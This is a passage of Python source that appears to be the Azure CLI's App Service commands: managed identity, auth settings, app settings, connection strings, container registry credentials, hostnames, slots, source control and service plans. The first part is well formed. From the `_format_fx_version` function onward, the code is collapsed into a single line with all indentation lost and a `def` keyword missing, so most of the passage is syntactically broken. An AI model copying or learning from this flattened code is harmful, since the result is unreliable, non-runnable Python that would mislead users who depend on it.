        result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
    if slot:
        result = [r for r in result if r.slot.lower() == slot.lower()]
    return result


def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
    """Enable the system-assigned managed identity on the app and (via the core
    helper) optionally grant it ``role`` over ``scope``. Returns the identity."""
    ManagedServiceIdentity = cmd.get_models('ManagedServiceIdentity')

    def getter():
        # re-fetch the site for the retry loop inside the core helper
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)

    def setter(webapp):
        webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update',
                                         slot, webapp)
        return LongRunningOperation(cmd.cli_ctx)(poller)

    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
    return webapp.identity


def show_identity(cmd, resource_group_name, name, slot=None):
    """Return the app's managed identity block."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
    """Disable the system-assigned managed identity (sets type to 'None')."""
    ManagedServiceIdentity = cmd.get_models('ManagedServiceIdentity')

    def getter():
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)

    def setter(webapp):
        webapp.identity = ManagedServiceIdentity(type='None')
        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update',
                                         slot, webapp)
        return LongRunningOperation(cmd.cli_ctx)(poller)

    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter)
    return webapp.identity


def get_auth_settings(cmd, resource_group_name, name, slot=None):
    """Return the app's authentication/authorization (Easy Auth) settings."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None,  # pylint: disable=unused-argument
                         client_id=None, token_store_enabled=None,  # pylint: disable=unused-argument
                         token_refresh_extension_hours=None,  # pylint: disable=unused-argument
                         allowed_external_redirect_urls=None, client_secret=None,  # pylint: disable=unused-argument
                         allowed_audiences=None, issuer=None, facebook_app_id=None,  # pylint: disable=unused-argument
                         facebook_app_secret=None, facebook_oauth_scopes=None,  # pylint: disable=unused-argument
                         twitter_consumer_key=None, twitter_consumer_secret=None,  # pylint: disable=unused-argument
                         google_client_id=None, google_client_secret=None,  # pylint: disable=unused-argument
                         google_oauth_scopes=None, microsoft_account_client_id=None,  # pylint: disable=unused-argument
                         microsoft_account_client_secret=None,  # pylint: disable=unused-argument
                         microsoft_account_oauth_scopes=None, slot=None):  # pylint: disable=unused-argument
    """Update Easy Auth settings; every non-None keyword is copied onto the
    settings object by reflection over this function's own argument list
    (bool-like flags are parsed from the string 'true')."""
    auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
    UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
    if action == 'AllowAnonymous':
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
    elif action:
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
        auth_settings.default_provider = AUTH_TYPES[action]

    import inspect
    frame = inspect.currentframe()
    bool_flags = ['enabled', 'token_store_enabled']
    # note: getargvalues is used already in azure.cli.core.commands.
    # and no simple functional replacement for this deprecating method for 3.5
    args, _, _, values = inspect.getargvalues(frame)  # pylint: disable=deprecated-method
    # args[2:] skips cmd and resource_group_name; remaining truthy args are
    # mirrored onto auth_settings attribute-by-attribute.
    for arg in args[2:]:
        if values.get(arg, None):
            setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')

    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings',
                                   slot, auth_settings)


def list_runtimes(cmd, linux=False):
    """Return the display names of supported runtime stacks for the given OS."""
    client = web_client_factory(cmd.cli_ctx)
    runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
    return [s['displayName'] for s in runtime_helper.stacks]


def _rename_server_farm_props(webapp):
    # Should be renamed in SDK in a future release
    setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
    del webapp.server_farm_id
    return webapp


def delete_function_app(cmd, resource_group_name, name, slot=None):
    """Delete a function app (or one of its slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)


def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
                  keep_dns_registration=None, slot=None):
    """Delete a web app or slot; each keep_* flag maps to its SDK negation
    (False to keep; None lets the service default apply)."""
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        client.web_apps.delete_slot(resource_group_name, name, slot,
                                    delete_metrics=False if keep_metrics else None,
                                    delete_empty_server_farm=False if keep_empty_plan else None,
                                    skip_dns_registration=False if keep_dns_registration else None)
    else:
        client.web_apps.delete(resource_group_name, name,
                               delete_metrics=False if keep_metrics else None,
                               delete_empty_server_farm=False if keep_empty_plan else None,
                               skip_dns_registration=False if keep_dns_registration else None)


def stop_webapp(cmd, resource_group_name, name, slot=None):
    """Stop a web app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)


def start_webapp(cmd, resource_group_name, name, slot=None):
    """Start a web app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
    """Restart a web app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)


def get_site_configs(cmd, resource_group_name, name, slot=None):
    """Return the app's SiteConfig resource."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)


def get_app_settings(cmd, resource_group_name, name, slot=None):
    """Return app settings annotated with which ones are slot-sticky."""
    result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
                                   .app_setting_names
    return _build_app_settings_output(result.properties, slot_app_setting_names)


def get_connection_strings(cmd, resource_group_name, name, slot=None):
    """Return connection strings as name/value dicts with a slotSetting marker."""
    result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
                              .connection_string_names or []
    result = [{'name': p,
               'value': result.properties[p],
               'slotSetting': p in slot_constr_names} for p in result.properties]
    return result


def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
    """Return Azure storage account mounts with a slotSetting marker per entry."""
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                     'list_azure_storage_accounts', slot)
    slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
                                            .azure_storage_config_names or []
    return [{'name': p,
             'value': result.properties[p],
             'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]


def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
    """Attach the FTP publish url from the publish profiles onto the Site object."""
    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
    setattr(webapp, 'ftpPublishingUrl', url)
    return webapp
_format_fx_version(custom_image_name, container_config_type=None): fx_version = custom_image_name.strip() fx_version_lower = fx_version.lower() # handles case of only spaces if fx_version: if container_config_type: fx_version = '{}|{}'.format(container_config_type, custom_image_name) elif not fx_version_lower.startswith('docker|'): fx_version = '{}|{}'.format('DOCKER', custom_image_name) else: fx_version = ' ' return fx_version def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None): fx_version = _format_fx_version(custom_image_name) web_app = get_webapp(cmd, resource_group_name, name, slot) linux_fx = fx_version if web_app.reserved else None windows_fx = fx_version if web_app.is_xenon else None return update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot) def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None): return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot) def _get_fx_version(cmd, resource_group_name, name, slot=None): site_config = get_site_configs(cmd, resource_group_name, name, slot) return site_config.linux_fx_version or site_config.windows_fx_version or '' def url_validator(url): try: result = urlparse(url) return all([result.scheme, result.netloc, result.path]) except ValueError: return False def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None): from base64 import b64decode linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot) if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]): raise CLIError("Cannot decode config that is not one of the" " following types: {}".format(','.join(MULTI_CONTAINER_TYPES))) return b64decode(linux_fx_version.split('|')[1].encode('utf-8')) def _get_linux_multicontainer_encoded_config_from_file(file_name): from base64 import b64encode config_file_bytes = None if url_validator(file_name): response = 
urlopen(file_name, context=_ssl_context()) config_file_bytes = response.read() else: with open(file_name, 'rb') as f: config_file_bytes = f.read() # Decode base64 encoded byte array into string return b64encode(config_file_bytes).decode('utf-8') # for any modifications to the non-optional parameters, adjust the reflection logic accordingly # in the method # pylint: disable=unused-argument def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None, windows_fx_version=None, pre_warmed_instance_count=None, php_version=None, python_version=None, net_framework_version=None, java_version=None, java_container=None, java_container_version=None, remote_debugging_enabled=None, web_sockets_enabled=None, always_on=None, auto_heal_enabled=None, use32_bit_worker_process=None, min_tls_version=None, http20_enabled=None, app_command_line=None, ftps_state=None, generic_configurations=None): configs = get_site_configs(cmd, resource_group_name, name, slot) if number_of_workers is not None: number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20) if linux_fx_version: if linux_fx_version.strip().lower().startswith('docker|'): update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"]) else: delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"]) if pre_warmed_instance_count is not None: pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count, min_val=0, max_val=20) import inspect frame = inspect.currentframe() bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on', 'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled'] int_flags = ['pre_warmed_instance_count', 'number_of_workers'] # note: getargvalues is used already in azure.cli.core.commands. 
# and no simple functional replacement for this deprecating method for 3.5 args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method for arg in args[3:]: if arg in int_flags and values[arg] is not None: values[arg] = validate_and_convert_to_int(arg, values[arg]) if arg != 'generic_configurations' and values.get(arg, None): setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true') generic_configurations = generic_configurations or [] result = {} for s in generic_configurations: try: result.update(get_json_object(s)) except CLIError: config_name, value = s.split('=', 1) result[config_name] = value for config_name, value in result.items(): setattr(configs, config_name, value) return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs) def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None): app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot) client = web_client_factory(cmd.cli_ctx) slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) is_slot_settings = False for setting_name in setting_names: app_settings.properties.pop(setting_name, None) if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names: slot_cfg_names.app_setting_names.remove(setting_name) is_slot_settings = True if is_slot_settings: client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_application_settings', app_settings.properties, slot, client) return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names) def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None): azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 
'list_azure_storage_accounts', slot) client = web_client_factory(cmd.cli_ctx) slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) is_slot_settings = False azure_storage_accounts.properties.pop(custom_id, None) if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names: slot_cfg_names.azure_storage_config_names.remove(custom_id) is_slot_settings = True if is_slot_settings: client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_azure_storage_accounts', azure_storage_accounts.properties, slot, client) return result.properties def _ssl_context(): if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'): try: return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6 except AttributeError: return ssl.SSLContext(ssl.PROTOCOL_TLSv1) return ssl.create_default_context() def _build_app_settings_output(app_settings, slot_cfg_names): slot_cfg_names = slot_cfg_names or [] return [{'name': p, 'value': app_settings[p], 'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)] def update_connection_strings(cmd, resource_group_name, name, connection_string_type, settings=None, slot=None, slot_settings=None): from azure.mgmt.web.models import ConnStringValueTypePair if not settings and not slot_settings: raise CLIError('Usage Error: --settings |--slot-settings') settings = settings or [] slot_settings = slot_settings or [] conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot) for name_value in settings + slot_settings: # split at the first '=', connection string should not have '=' in the name conn_string_name, value = name_value.split('=', 1) if value[0] in ["'", '"']: # strip away the quots used as separators value = value[1:-1] 
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value, type=connection_string_type) client = web_client_factory(cmd.cli_ctx) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_connection_strings', conn_strings.properties, slot, client) if slot_settings: new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings] slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or [] slot_cfg_names.connection_string_names += new_slot_setting_names client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return result.properties def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None): conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot) client = web_client_factory(cmd.cli_ctx) slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) is_slot_settings = False for setting_name in setting_names: conn_strings.properties.pop(setting_name, None) if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names: slot_cfg_names.connection_string_names.remove(setting_name) is_slot_settings = True if is_slot_settings: client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_connection_strings', conn_strings.properties, slot, client) CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME', 'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"] APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD'] def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None, docker_custom_image_name=None, 
docker_registry_server_user=None, websites_enable_app_service_storage=None, docker_registry_server_password=None, multicontainer_config_type=None, multicontainer_config_file=None, slot=None): settings = [] if docker_registry_server_url is not None: settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url) if (not docker_registry_server_user and not docker_registry_server_password and docker_registry_server_url and '.azurecr.io' in docker_registry_server_url): logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...') parsed = urlparse(docker_registry_server_url) registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0] try: docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name) except Exception as ex: # pylint: disable=broad-except logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed if docker_registry_server_user is not None: settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user) if docker_registry_server_password is not None: settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password) if docker_custom_image_name is not None: _add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot) if websites_enable_app_service_storage: settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage) if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long update_app_settings(cmd, resource_group_name, name, settings, slot) settings = get_app_settings(cmd, resource_group_name, name, slot) if multicontainer_config_file and multicontainer_config_type: encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file) linux_fx_version = 
_format_fx_version(encoded_config_file, multicontainer_config_type) update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot) elif multicontainer_config_file or multicontainer_config_type: logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE') return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings, slot=slot)) def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None, docker_custom_image_name=None, docker_registry_server_user=None, docker_registry_server_password=None, slot=None): return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url, docker_custom_image_name, docker_registry_server_user, None, docker_registry_server_password, multicontainer_config_type=None, multicontainer_config_file=None, slot=slot) def _get_acr_cred(cli_ctx, registry_name): from azure.mgmt.containerregistry import ContainerRegistryManagementClient from azure.cli.core.commands.parameters import get_resources_in_subscription client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries') result = [item for item in result if item.name.lower() == registry_name] if not result or len(result) > 1: raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name)) resource_group_name = parse_resource_id(result[0].id)['resource_group'] registry = client.get(resource_group_name, registry_name) if registry.admin_user_enabled: # pylint: disable=no-member cred = client.list_credentials(resource_group_name, registry_name) return cred.username, cred.passwords[0].value raise CLIError("Failed to retrieve container registry credentials. 
Please either provide the " "credentials or run 'az acr update -n {} --admin-enabled true' to enable " "admin first.".format(registry_name)) def delete_container_settings(cmd, resource_group_name, name, slot=None): _delete_linux_fx_version(cmd, resource_group_name, name, slot) delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot) def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None): settings = get_app_settings(cmd, resource_group_name, name, slot) return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings, show_multicontainer_config, slot)) def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None): return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot) def _filter_for_container_settings(cmd, resource_group_name, name, settings, show_multicontainer_config=None, slot=None): result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES] fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip() if fx_version: added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME', 'value': fx_version} result.append(added_image_name) if show_multicontainer_config: decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot) decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED', 'value': decoded_value} result.append(decoded_image_name) return result # TODO: remove this when #3660(service tracking issue) is resolved def _mask_creds_related_appsettings(settings): for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]: settings[x] = None return settings def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None): HostNameBinding = cmd.get_models('HostNameBinding') client = web_client_factory(cmd.cli_ctx) webapp = client.web_apps.get(resource_group_name, webapp_name) if not webapp: raise 
CLIError("'{}' app doesn't exist".format(webapp_name)) binding = HostNameBinding(location=webapp.location, site_name=webapp.name) if slot is None: return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding) return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding, slot) def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None): client = web_client_factory(cmd.cli_ctx) if slot is None: return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname) return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname) def list_hostnames(cmd, resource_group_name, webapp_name, slot=None): result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_host_name_bindings', slot)) for r in result: r.name = r.name.split('/')[-1] return result def get_external_ip(cmd, resource_group_name, webapp_name): SslState = cmd.get_models('SslState') # logics here are ported from portal client = web_client_factory(cmd.cli_ctx) webapp = client.web_apps.get(resource_group_name, webapp_name) if not webapp: raise CLIError("'{}' app doesn't exist".format(webapp_name)) if webapp.hosting_environment_profile: address = client.app_service_environments.list_vips( resource_group_name, webapp.hosting_environment_profile.name) if address.internal_ip_address: ip_address = address.internal_ip_address else: vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None) ip_address = vip.virtual_ip if vip else address.service_ip_address else: ip_address = _resolve_hostname_through_dns(webapp.default_host_name) return {'ip': ip_address} def _resolve_hostname_through_dns(hostname): import socket return socket.gethostbyname(hostname) def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None): Site, SiteConfig = 
cmd.get_models('Site', 'SiteConfig') client = web_client_factory(cmd.cli_ctx) site = client.web_apps.get(resource_group_name, webapp) if not site: raise CLIError("'{}' app doesn't exist".format(webapp)) if 'functionapp' in site.kind: raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp)) location = site.location slot_def = Site(server_farm_id=site.server_farm_id, location=location) slot_def.site_config = SiteConfig() poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot) result = LongRunningOperation(cmd.cli_ctx)(poller) if configuration_source: update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source) result.name = result.name.split('/')[-1] return result def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None): Site = cmd.get_models('Site') client = web_client_factory(cmd.cli_ctx) site = client.web_apps.get(resource_group_name, name) if not site: raise CLIError("'{}' function app doesn't exist".format(name)) location = site.location slot_def = Site(server_farm_id=site.server_farm_id, location=location) poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot) result = LongRunningOperation(cmd.cli_ctx)(poller) if configuration_source: update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source) result.name = result.name.split('/')[-1] return result def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None): clone_from_prod = configuration_source.lower() == webapp.lower() site_config = get_site_configs(cmd, resource_group_name, webapp, None if clone_from_prod else configuration_source) _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config) # slot create doesn't clone over the app-settings and 
connection-strings, so we do it here # also make sure slot settings don't get propagated. slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp) src_slot = None if clone_from_prod else configuration_source app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'list_application_settings', src_slot) for a in slot_cfg_names.app_setting_names or []: app_settings.properties.pop(a, None) connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'list_connection_strings', src_slot) for a in slot_cfg_names.connection_string_names or []: connection_strings.properties.pop(a, None) _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_application_settings', app_settings.properties, slot, client) _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_connection_strings', connection_strings.properties, slot, client) def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals manual_integration=None, git_token=None, slot=None, cd_app_type=None, app_working_dir=None, nodejs_task_runner=None, python_framework=None, python_version=None, cd_account_create=None, cd_project_url=None, test=None, slot_swap=None, private_repo_username=None, private_repo_password=None): client = web_client_factory(cmd.cli_ctx) location = _get_location_from_webapp(client, resource_group_name, name) if cd_project_url: # Add default values cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type python_framework = 'Django' if python_framework is None else python_framework python_version = 'Python 3.5.3 x86' if python_version is None else python_version webapp_list = None if test is None else list_webapp(resource_group_name) vsts_provider = VstsContinuousDeliveryProvider() cd_app_type_details = { 'cd_app_type': cd_app_type, 'app_working_dir': app_working_dir, 'nodejs_task_runner': 
nodejs_task_runner, 'python_framework': python_framework, 'python_version': python_version } try: status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url, branch, git_token, slot_swap, cd_app_type_details, cd_project_url, cd_account_create, location, test, private_repo_username, private_repo_password, webapp_list) except RuntimeError as ex: raise CLIError(ex) logger.warning(status.status_message) return status non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework, python_version, cd_account_create, test, slot_swap] if any(non_vsts_params): raise CLIError('Following parameters are of no use when cd_project_url is None: ' + 'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' + 'python_version, cd_account_create, test, slot_swap') from azure.mgmt.web.models import SiteSourceControl, SourceControl if git_token: sc = SourceControl(location=location, source_control_name='GitHub', token=git_token) client.update_source_control('GitHub', sc) source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch, is_manual_integration=manual_integration, is_mercurial=(repository_type != 'git')) # SCC config can fail if previous commands caused SCMSite shutdown, so retry here. for i in range(5): try: poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_source_control', slot, source_control) return LongRunningOperation(cmd.cli_ctx)(poller) except Exception as ex: # pylint: disable=broad-except import re ex = ex_handler_factory(no_throw=True)(ex) # for non server errors(50x), just throw; otherwise retry 4 times if i == 4 or not re.findall(r'\(50\d\)', str(ex)): raise logger.warning('retrying %s/4', i + 1) time.sleep(5) # retry in a moment def update_git_token(cmd, git_token=None): ''' Update source control token cached in Azure app service. If no token is provided, the command will clean up existing token. 
''' client = web_client_factory(cmd.cli_ctx) from azure.mgmt.web.models import SourceControl sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '') return client.update_source_control('GitHub', sc) def show_source_control(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot) def delete_source_control(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot) def enable_local_git(cmd, resource_group_name, name, slot=None): SiteConfigResource = cmd.get_models('SiteConfigResource') client = web_client_factory(cmd.cli_ctx) location = _get_location_from_webapp(client, resource_group_name, name) site_config = SiteConfigResource(location=location) site_config.scm_type = 'LocalGit' if slot is None: client.web_apps.create_or_update_configuration(resource_group_name, name, site_config) else: client.web_apps.create_or_update_configuration_slot(resource_group_name, name, site_config, slot) return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)} def sync_site_repo(cmd, resource_group_name, name, slot=None): try: return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot) except CloudError as ex: # Because of bad spec, sdk throws on 200. 
We capture it here if ex.status_code not in [200, 204]: raise ex def list_app_service_plans(cmd, resource_group_name=None): client = web_client_factory(cmd.cli_ctx) if resource_group_name is None: plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites" else: plans = list(client.app_service_plans.list_by_resource_group(resource_group_name)) for plan in plans: # prune a few useless fields del plan.geo_region del plan.subscription return plans def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False, app_service_environment=None, sku='B1', number_of_workers=None, location=None, tags=None, no_wait=False): HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models( 'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan') sku = _normalize_sku(sku) _validate_asp_sku(app_service_environment, sku) if is_linux and hyper_v: raise CLIError('usage error: --is-linux | --hyper-v') client = web_client_factory(cmd.cli_ctx) if app_service_environment: if hyper_v: raise CLIError('Windows containers is not yet supported in app service environment') ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name) ase_def = HostingEnvironmentProfile(id=ase_id) ase_list = client.app_service_environments.list() ase_found = False for ase in ase_list: if ase.id.lower() == ase_id.lower(): location = ase.location ase_found = True break if not ase_found: raise CLIError("App service environment '{}' not found in subscription.".format(ase_id)) else: # Non-ASE ase_def = None if location is None: location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name) # the api is odd on parameter naming, have to live with it for now sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers) plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def, reserved=(is_linux or None), hyper_v=(hyper_v or None), 
